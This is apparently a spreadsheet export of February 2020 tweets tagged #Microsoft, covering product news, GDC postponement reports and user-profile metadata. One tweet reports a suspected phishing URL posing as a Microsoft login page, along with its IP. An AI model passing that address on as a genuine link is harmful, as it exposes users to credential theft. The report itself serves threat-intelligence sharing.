    <t>Sat Feb 29 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:25 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:52:59 +0000 2020</t>
  </si>
  <si>
    <t>New #M365Roadmap Item
61502: Profile Card Customization through Microsoft Graph Beta
Release: Q3 CY2020
State: In development
Phase: Preview,
#Microsoft
https://t.co/fZwdQp6Ozv</t>
  </si>
  <si>
    <t>Sat Feb 29 02:49:24 +0000 2020</t>
  </si>
  <si>
    <t>Miss those days. #gamecube #dreamcast #xbox #playstation #nintendo #sega #microsoft #sony #gamer #gaymer #nintendogamecube #segadreamcast #microsoftxbox #sonyplaystation2 @ Jurupa Valley, California https://t.co/Kty8XUxpJz</t>
  </si>
  <si>
    <t>{'id': 720873631987830784, 'id_str': '720873631987830784', 'name': 'Hector Govea', 'screen_name': 'HGNishino11', 'location': 'Jurupa Valley, CA', 'description': 'Anime, videogames, manga, music, films, TV.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 358, 'listed_count': 0, 'created_at': 'Fri Apr 15 07:17:21 +0000 2016', 'favourites_count': 471, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2397, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1111827502274498560/lrdClQc0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111827502274498560/lrdClQc0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/720873631987830784/1533165009',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</si>
  <si>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02:42:28 +0000 2020</t>
  </si>
  <si>
    <t>Tested out our brand new #LinkedInLounge here at @Microsoft. We welcome our customers, employees and partners globally to come and check it out - and get some fresh new headshots. #microsoftlife #Microsoft #LinkedIn 
@MicrosoftLife @LinkedIn  
A thread... https://t.co/SEGzk80du0</t>
  </si>
  <si>
    <t>Sat Feb 29 02:28:23 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> https://login.live.com.login.microsoft.didiskon.co.id
Suspected #phishing #opendir
AS45731 [103.6.53.54]
Let's Encrypt Authority X3
Keywords: #login #live #microsoft
https://t.co/4YV08dYMHW</t>
  </si>
  <si>
    <t>Sat Feb 29 02:27:57 +0000 2020</t>
  </si>
  <si>
    <t>The #Pope joins forces with #Microsoft and #IBM to create a doctrine for ethical #AI and #FacialRecognition https://t.co/dSxp1JAzqn</t>
  </si>
  <si>
    <t>{'id': 1478409727, 'id_str': '1478409727', 'name': 'Venki Krishnamoorthy', 'screen_name': 'venki_hriscloud', 'location': 'Pittsburgh, PA', 'description': 'Successfactors Consultant / SAP Press Author / HR Conferences speaker. This is my personal id and views expressed here are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1967, 'friends_count': 737, 'listed_count': 128, 'created_at': 'Sun Jun 02 22:58:01 +0000 2013', 'favourites_count': 4467, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8371,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'http://pbs.twimg.com/profile_images/754466208695525376/gSaHS2UH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/754466208695525376/gSaHS2UH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1478409727/1468713257',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</si>
  <si>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Sat Feb 29 02:26:47 +0000 2020</t>
  </si>
  <si>
    <t>Dark Mode for Android widgets removed in 1/9/2020 update. Blinding light mode on widgets again. When can this be fixed? #Office #Android #microsoft</t>
  </si>
  <si>
    <t>{'id': 11809092, 'id_str': '11809092', 'name': 'Scott Regitz', 'screen_name': 'shawellaby', 'location': 'Cypress, TX', 'description': 'Father * Husband * Cyclist * Software Engineer * Life Long Cougar * Microsoft Stack for 25+ years * #WindowsInsider', 'url': 'https://t.co/yN9wcMxovi', 'entities': {'url': {'urls': [{'url': 'https://t.co/yN9wcMxovi', 'expanded_url': 'http://www.linkedin.com/in/scottregitz', 'display_url': 'linkedin.com/in/scottregitz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 234, 'friends_count': 578, 'listed_count': 15, 'created_at': 'Thu Jan 03 18:59:37 +0000 2008', 'favourites_count': 170, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1948,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'http://pbs.twimg.com/profile_images/1045311134411026432/sYkRbgdr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045311134411026432/sYkRbgdr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/11809092/1468962692', 'profile_link_color': '19CF86', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '99CC33', 'profile_text_color': '3E4415', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 02:26:01 +0000 2020</t>
  </si>
  <si>
    <t>Which Service is Better for Essay Writing: LibreOffice Writer, Microsoft Word, or Google Docs? - NoobsLab. https://t.co/WpjEMB6ibL When you just need to write text and do not... #Google #LibreOffice #Linux #Microsoft #Ubuntu #docs #google #googledocs #linux #microsoftword</t>
  </si>
  <si>
    <t>Sat Feb 29 02:20:02 +0000 2020</t>
  </si>
  <si>
    <t>Playing Fortnite for Competition  | 117/200 Followers! https://t.co/yCF3AOgQi2 #fortnite #fortniteseason2 #xbox #microsoft #pc #pcgaming #fun #FridayThoughts #xbox #twitch #twitchtv #twitchstreamer #live #streaming #friends #join</t>
  </si>
  <si>
    <t>Sat Feb 29 02:17:16 +0000 2020</t>
  </si>
  <si>
    <t>Run your legacy #Java #apps in the new #Microsoft #Edge 
https://t.co/4p2e1tEl0L</t>
  </si>
  <si>
    <t>{'id': 1040622067261956096, 'id_str': '1040622067261956096', 'name': 'Henry Irvine', 'screen_name': 'thehenryirvine', 'location': 'San Francisco, CA', 'description': 'Writer. Reader. Hiker. Feed Her.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 628, 'friends_count': 1051, 'listed_count': 3, 'created_at': 'Fri Sep 14 15:23:29 +0000 2018', 'favourites_count': 167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 752,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'http://pbs.twimg.com/profile_images/1167207151753777152/eUmrpwMz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167207151753777152/eUmrpwMz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1040622067261956096/1567118227', 'profile_link_color': '43481B',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</si>
  <si>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02:11:05 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/VyMNwfRL4f 
Related Vs RelatedTable DAX in Power BI - TAIK18 explained in the video link
#MICROSOFT #POWERBI #TAIK18 #DAX
 #RELATEDTABLE #RELATED https://t.co/dJnKNCPBh2</t>
  </si>
  <si>
    <t>Sat Feb 29 02:10:01 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X may not be delayed by coronavirus, but new Microsoft Surface products could be https://t.co/6jX1dbQuVI #XboxSeriesX #Microsoft #MicrosoftSurface https://t.co/lkH9LRSeI8</t>
  </si>
  <si>
    <t>Sat Feb 29 02:06:06 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC Azure HBv2-series Virtual Machines (VMs) are now generally available in the South Central US region. HBv2 VMs will also be available in Wes... #data #microsoft #ai https://t.co/X15HJDniWo https://t.co/oWeR7t5WgN</t>
  </si>
  <si>
    <t>Sat Feb 29 02:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Amber, Acid Pods and Itching Fields | Journey to the Savage Planet #4
https://t.co/cFaIZHW3kE 
#kberrygaming #youtube #pc #gaming #steamgames #steam #ea #kristikberry #epic #epicgames #TyphoonStudios #505Games #adventure #PlayStation #microsoft #ps4 #journeytothesavageplanet</t>
  </si>
  <si>
    <t>Sat Feb 29 02:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/qYmro7EKFa</t>
  </si>
  <si>
    <t>Sat Feb 29 02:03:43 +0000 2020</t>
  </si>
  <si>
    <t>So excited I passed Microsoft PowerApps Fundamentals exam today! #Microsoft #PowerApps</t>
  </si>
  <si>
    <t>{'id': 27907106, 'id_str': '27907106', 'name': 'Jason Ragsdale', 'screen_name': 'jpragsdale', 'location': 'Chicago', 'description': 'Husband, Father, geek, photographer and probably a few other things...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 162, 'friends_count': 884, 'listed_count': 7, 'created_at': 'Tue Mar 31 16:39:34 +0000 2009', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 478,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'http://pbs.twimg.com/profile_images/990946240690032641/4r2XTcoA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/990946240690032641/4r2XTcoA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27907106/1525095297',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</si>
  <si>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01:50:49 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/L2Ur4GKZnv
Here is top #100questions for #asp .net interview questions click on #link and learn for your #interview
#Microsoft #technology #web #development #learn https://t.co/qUcDMTxNIu</t>
  </si>
  <si>
    <t>{'id': 1216794283404980231, 'id_str': '1216794283404980231', 'name': 'Birdofy', 'screen_name': 'Birdofy1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 49, 'listed_count': 0, 'created_at': 'Mon Jan 13 18:49:07 +0000 2020', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1235479968571887617/KALbOCiM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235479968571887617/KALbOCiM_normal.png',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</si>
  <si>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01:50:03 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 01:49:34 +0000 2020</t>
  </si>
  <si>
    <t>Thoughts? San Francisco :: Game Developers Conference in SF postponed as coronavirus fears grow - San Francisco Chronicle: Game Developers Conference in SF postponed as coronavirus fears... https://t.co/sjLu6ZHnk1 #ChaseDiFeliciantonio #ChaseDiFelice #SF #MosconeCenter #Microsoft</t>
  </si>
  <si>
    <t>{'id': 853007708814954496, 'id_str': '853007708814954496', 'name': 'Shaun Haines åŠ›æ˜¯äº®', 'screen_name': 'HainesForSF', 'location': 'San Francisco, CA', 'description': 'SF Native', 'url': 'https://t.co/yw1xXyJyKk', 'entities': {'url': {'urls': [{'url': 'https://t.co/yw1xXyJyKk', 'expanded_url': 'http://HFORSF.NET', 'display_url': 'HFORSF.NET', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4201, 'friends_count': 4987, 'listed_count': 33, 'created_at': 'Fri Apr 14 22:11:00 +0000 2017', 'favourites_count': 7465, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 157356,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'http://pbs.twimg.com/profile_images/1235607463258247168/1fcRzCpb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235607463258247168/1fcRzCpb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/853007708814954496/1583426550',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</si>
  <si>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01:45:00 +0000 2020</t>
  </si>
  <si>
    <t>@okbillybunny Sophia Here! #SoftwareDeveloper #GirlsLikeUs #Microsoft https://t.co/djnRuT13qk</t>
  </si>
  <si>
    <t>{'id': 4704801806, 'id_str': '4704801806', 'name': 'Sophia Lee', 'screen_name': 'GeekGirl1024', 'location': 'Seattle, WA', 'description': '@Microsoft Dev. @Genderjusticewa Board Chair. @Seawomenscomm Commissioner. Social Justice, Trans. Learning to love my new life! â¤ðŸ’›ðŸ’šðŸ’™ðŸ’œ Opinions are my own.', 'url': 'https://t.co/2eeHNHKzRx', 'entities': {'url': {'urls': [{'url': 'https://t.co/2eeHNHKzRx', 'expanded_url': 'http://www.transgirltheory.com', 'display_url': 'transgirltheory.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1090, 'friends_count': 931, 'listed_count': 67, 'created_at': 'Sun Jan 03 19:53:23 +0000 2016', 'favourites_count': 3073, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5644,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'http://pbs.twimg.com/profile_images/930896431832899584/XUh7lvJU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/930896431832899584/XUh7lvJU_normal.jpg', 'profile_link_color': 'F5ABB5',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</si>
  <si>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01:32:33 +0000 2020</t>
  </si>
  <si>
    <t>LinkedIn is internally testing a Snapchat-like Stories feature #LinkedIn #MIcrosoft #Stories: https://t.co/vUr2XtAat3 via @NeowinFeed</t>
  </si>
  <si>
    <t>{'id': 23571181, 'id_str': '23571181', 'name': 'Bhaskar Jayaraman', 'screen_name': 'jaybhaskar', 'location': 'San Francisco, CA', 'description': 'Favorite food: Good food\nFavorite place: Good place\nFavorite hobby: Good hobby\nFavorite people: Good people\nFavorite quote: Good', 'url': 'http://t.co/z8NV1Madft', 'entities': {'url': {'urls': [{'url': 'http://t.co/z8NV1Madft', 'expanded_url': 'http://jay-bhaskar.blogspot.com/', 'display_url': 'jay-bhaskar.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 528, 'friends_count': 680, 'listed_count': 36, 'created_at': 'Tue Mar 10 08:39:05 +0000 2009', 'favourites_count': 1672, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13811,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'http://pbs.twimg.com/profile_images/1041798360842166273/7Lkdyq8e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041798360842166273/7Lkdyq8e_normal.jpg',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</si>
  <si>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Sat Feb 29 01:31:40 +0000 2020</t>
  </si>
  <si>
    <t>Larry Hryb, the head of Microsoft Xbox Live, has announced a new quick resume feature for the Xbox Series X, which would instantly resume multiple games after the console has rebooted, or even after switching titles.  #microsoft #XboxSeriesX https://t.co/fJZcSi97pV https://t.co/VwXf9cVHrB</t>
  </si>
  <si>
    <t>Sat Feb 29 01:28:25 +0000 2020</t>
  </si>
  <si>
    <t>2020 Game Developers Conference cancels due to coronavirus https://t.co/ly7WLVRxqw #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 01:08:49 +0000 2020</t>
  </si>
  <si>
    <t>and after some months the result is finally out! #BetaNeverAgain #Microsoft #MB400 https://t.co/JjjHlKY6mR</t>
  </si>
  <si>
    <t>Sat Feb 29 01:07:07 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 01:04:53 +0000 2020</t>
  </si>
  <si>
    <t>Using SWAY to reflect on learning at the end of the week is a great way for students to track their progress and see how far they have come. #studentsuccess #reflection #Microsoft #MicrosoftEDU #sciencerocks #stem @FUSD_Southridge https://t.co/G6mKGPBDWT</t>
  </si>
  <si>
    <t>{'id': 1232072589335396352, 'id_str': '1232072589335396352', 'name': 'Danielle Keebler', 'screen_name': 'DanielleKeebler', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Mon Feb 24 22:40:03 +0000 2020', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1232076133799059458/hKnsWKyV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232076133799059458/hKnsWKyV_normal.jpg',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</si>
  <si>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01:04:41 +0000 2020</t>
  </si>
  <si>
    <t>@SQLFlipFlopsDBA @texasamy The marketing folks were very receptive to making sure I received the prize after hearing where I was.  They made a supreme effort to ship it to my RV site and seriously, had no idea what Id even won till it showed up!  #microsoft #rocks</t>
  </si>
  <si>
    <t>{'id': 32714270, 'id_str': '32714270', 'name': 'âœ¨ðŸ’«Kellyn Command Line ðŸ’»âœ¨', 'screen_name': 'DBAKevlar', 'location': 'United States', 'description': "Global Engineer @Microsoft- #Oracle on #Azure |  @OakTableNetwork #DBA #DevOps #Data Optimizer | Opinions are my own | Replaces Idiots W/Scripts | Karma's BFF", 'url': 'https://t.co/okD3ZkavfN', 'entities': {'url': {'urls': [{'url': 'https://t.co/okD3ZkavfN', 'expanded_url': 'https://dbakevlar.com', 'display_url': 'dbakevlar.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7208, 'friends_count': 2751, 'listed_count': 301, 'created_at': 'Sat Apr 18 01:34:45 +0000 2009', 'favourites_count': 32229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 50090, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '131516', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1143605904023019520/5YvUo1P1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143605904023019520/5YvUo1P1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/32714270/1561491870', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'BD755F', 'profile_text_color': '997869', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 01:03:43 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft releases free migration tool to help you moved your files to SharePoint Online with ease
#SharePoint #SharePointOnline #Office365 #M365 #Mover #SharePointMigrations #Microsoft
https://t.co/SlXM5mSjp3 https://t.co/1cIP2gCTAG</t>
  </si>
  <si>
    <t>Sat Feb 29 01:02:21 +0000 2020</t>
  </si>
  <si>
    <t>Media coverage #bias to the Left for "Game Developers Conference 2020 has been postponed due to coronavirus concerns" See all sides on Ground News #GDC #Tech #Business #Facebook #Microsoft https://t.co/SvAM8p7791</t>
  </si>
  <si>
    <t>{'id': 961721367854018563, 'id_str': '961721367854018563', 'name': 'Ground News', 'screen_name': 'Ground_app', 'location': '', 'description': 'Worldâ€™s First News Source Comparison Platform. See the news you are not seeing: https://t.co/mxl1i6u9R4', 'url': 'https://t.co/coJ26XWJ20', 'entities': {'url': {'urls': [{'url': 'https://t.co/coJ26XWJ20', 'expanded_url': 'http://ground.news', 'display_url': 'ground.news', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/mxl1i6u9R4', 'expanded_url': 'http://try.ground.news', 'display_url': 'try.ground.news', 'indices': [80, 103]}]}}, 'protected': False, 'followers_count': 1754, 'friends_count': 4876, 'listed_count': 16, 'created_at': 'Thu Feb 08 22:00:16 +0000 2018', 'favourites_count': 274, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 929,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'http://pbs.twimg.com/profile_images/1215316991822716928/04P3rYMj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215316991822716928/04P3rYMj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/961721367854018563/1578589127',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</si>
  <si>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01:02:20 +0000 2020</t>
  </si>
  <si>
    <t>See how the @verge coverage compares against other news outlets on Ground News #GDC #Tech #Business #Facebook #Microsoft https://t.co/2fGH3GMzxd</t>
  </si>
  <si>
    <t>Sat Feb 29 01:02:15 +0000 2020</t>
  </si>
  <si>
    <t>See how the @pcgamer coverage compares against other news outlets on Ground News #GDC #Tech #Business #Facebook #Microsoft https://t.co/2fGH3GuYFF</t>
  </si>
  <si>
    <t>Sat Feb 29 01:00:43 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact Noverus Innovations to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/e6N781Q8Aj</t>
  </si>
  <si>
    <t>Sat Feb 29 01:00:14 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/gx4W7a07j8</t>
  </si>
  <si>
    <t>Sat Feb 29 01:00:00 +0000 2020</t>
  </si>
  <si>
    <t>$VERB #Partners #BusinessPartners #InteractiveVideo #CloudProviders #CloudPlatforms
#CloudPartners #Salesforce #Microsoft #Integrations
https://t.co/QaxeVYFlxy https://t.co/QhF2CJ8Wvw</t>
  </si>
  <si>
    <t>Sat Feb 29 00:52:01 +0000 2020</t>
  </si>
  <si>
    <t>CFRA senior analyst John Freeman joined @YahooFinance to discuss #Microsoft's warning that they do not expect to meet the quarterly revenue guidance it had given for the part of its business that includes Windows. #CloudService $MSFT
https://t.co/5LrxZJGNGm</t>
  </si>
  <si>
    <t>{'id': 3256546882, 'id_str': '3256546882', 'name': 'CFRA Research', 'screen_name': 'cfraresearch', 'location': 'New York, NY', 'description': 'Global leader in institutional-grade independent equity research through sophisticated forensic analysis and broad fundamental equity research.', 'url': 'http://t.co/A6w7lASDZQ', 'entities': {'url': {'urls': [{'url': 'http://t.co/A6w7lASDZQ', 'expanded_url': 'http://www.cfraresearch.com', 'display_url': 'cfraresearch.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2239, 'friends_count': 331, 'listed_count': 59, 'created_at': 'Fri May 15 13:00:39 +0000 2015', 'favourites_count': 525, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3094,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'http://pbs.twimg.com/profile_images/849333930612453378/DiLtasCU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/849333930612453378/DiLtasCU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3256546882/1476796155', 'profile_link_color': '003262',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</si>
  <si>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00:49:36 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 00:47:49 +0000 2020</t>
  </si>
  <si>
    <t>#Game #Developers Conf/#GDC2020 #SanFrancisco Mar 16-20 Postponed Due To #COVID19/#Coronavirus
Major Annual Event #VideoGame #Programmers/#Designers
No New Dates/Last yr 29K attended 
Earlier Cancel: #Amazon #Web Svcs/#AWS #Facebook #Microsoft
https://t.co/Wmza1VuY0x
2/#tech #GDC</t>
  </si>
  <si>
    <t>{'id': 2183520866, 'id_str': '2183520866', 'name': 'tiniskwerl', 'screen_name': 'tiniskwerl', 'location': 'Northern California USA', 'description': 'tiny, old, grey, a bit cranky\nI Tweet A Lot\nLIST/MUTE to Save Timeline\nTwitterJail/Suspended Fri Oct11-Mon Oct14\nTweets may be old info/Have to catch up', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1586, 'friends_count': 427, 'listed_count': 1027, 'created_at': 'Sat Nov 09 03:45:23 +0000 2013', 'favourites_count': 403032, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 430957,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'http://pbs.twimg.com/profile_images/412832329795522562/oxZ13kuE_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/412832329795522562/oxZ13kuE_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2183520866/1398245990',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</si>
  <si>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Sat Feb 29 00:47:20 +0000 2020</t>
  </si>
  <si>
    <t>Az Kung Fu VM  Master Tools for Azure Administrators
 #AzureCLI #CLI #DevOps #Microsoft
https://t.co/wXxQoQO6DB</t>
  </si>
  <si>
    <t>Sat Feb 29 00:45:54 +0000 2020</t>
  </si>
  <si>
    <t>Awww man! I thought only a few people getting sick  wasnt a big deal! Everyone is afraid of Xbox right now! Wow! #Microsoft 
https://t.co/lfXPqZPy8d</t>
  </si>
  <si>
    <t>{'id': 730557398973190144, 'id_str': '730557398973190144', 'name': 'Bad Hombre', 'screen_name': 'charlemange93', 'location': 'Denver, CO', 'description': 'Bachelors In Science. Biology Major. Organic Chemistry WIZARD. Certified Nursing Assistant', 'url': 'https://t.co/zDIvHg9oP9', 'entities': {'url': {'urls': [{'url': 'https://t.co/zDIvHg9oP9', 'expanded_url': 'https://www.youtube.com/channel/UCIoKGwguHe3wcc-nz6lclaw', 'display_url': 'youtube.com/channel/UCIoKGâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 647, 'friends_count': 785, 'listed_count': 39, 'created_at': 'Thu May 12 00:37:11 +0000 2016', 'favourites_count': 75702, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 108331, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1107271142744559617/SnQxYGaF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1107271142744559617/SnQxYGaF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/730557398973190144/1582333646',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</si>
  <si>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Sat Feb 29 00:43:14 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info 2020 Game Developers Conference cancels due to coronavirus https://t.co/ciq2mP29kv</t>
  </si>
  <si>
    <t>Sat Feb 29 00:42:37 +0000 2020</t>
  </si>
  <si>
    <t>Introducing the HyperFlex Application Platform https://t.co/wKgj80pGS5
For more info: https://t.co/jmoqjX1WcM #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business https://t.co/GcoscTNkKT</t>
  </si>
  <si>
    <t>Sat Feb 29 00:39:40 +0000 2020</t>
  </si>
  <si>
    <t>@TWTHEREDDRAGON Must be afraid from #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 00:39:02 +0000 2020</t>
  </si>
  <si>
    <t>This so-called Rome Call for AI Ethics carries the endorsement of the #Vatican as well as #Microsoft and #IBM.
#ArtificialIntelligence
#ethics
https://t.co/eeJSm6Jkp4</t>
  </si>
  <si>
    <t>{'id': 6956742, 'id_str': '6956742', 'name': 'Avanti Kumar', 'screen_name': 'avantikumar', 'location': 'Malaysia', 'description': 'â€œTracking Asiaâ€™s Digital Journeyâ€ - Asia-based British independent journalist, editor, author, corporate content specialist. Reformed consultant. #REALNEWS', 'url': 'https://t.co/f6O6eG0fYX', 'entities': {'url': {'urls': [{'url': 'https://t.co/f6O6eG0fYX', 'expanded_url': 'https://muckrack.com/avantikumar', 'display_url': 'muckrack.com/avantikumar', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 785, 'friends_count': 571, 'listed_count': 35, 'created_at': 'Wed Jun 20 06:41:43 +0000 2007', 'favourites_count': 471, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3700,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'http://pbs.twimg.com/profile_images/570213736549523456/384c6ifP_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/570213736549523456/384c6ifP_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6956742/1572690390', 'profile_link_color': '1B95E0',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</si>
  <si>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Sat Feb 29 00:38:24 +0000 2020</t>
  </si>
  <si>
    <t>GDC 2020 has been canceled https://t.co/PJWSy5AGA7 #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 00:38:22 +0000 2020</t>
  </si>
  <si>
    <t>Game Developers Conference "Postponed" amid #Coronavirus #Crisis #Health #Concerns
Key participants such as #Facebook Gaming, #Sony, #Microsoft, and #EpicGames had pulled out of the event over the past two weeks, citing health concerns amid the spreading #pandemic. https://t.co/8hm2wMhjI3</t>
  </si>
  <si>
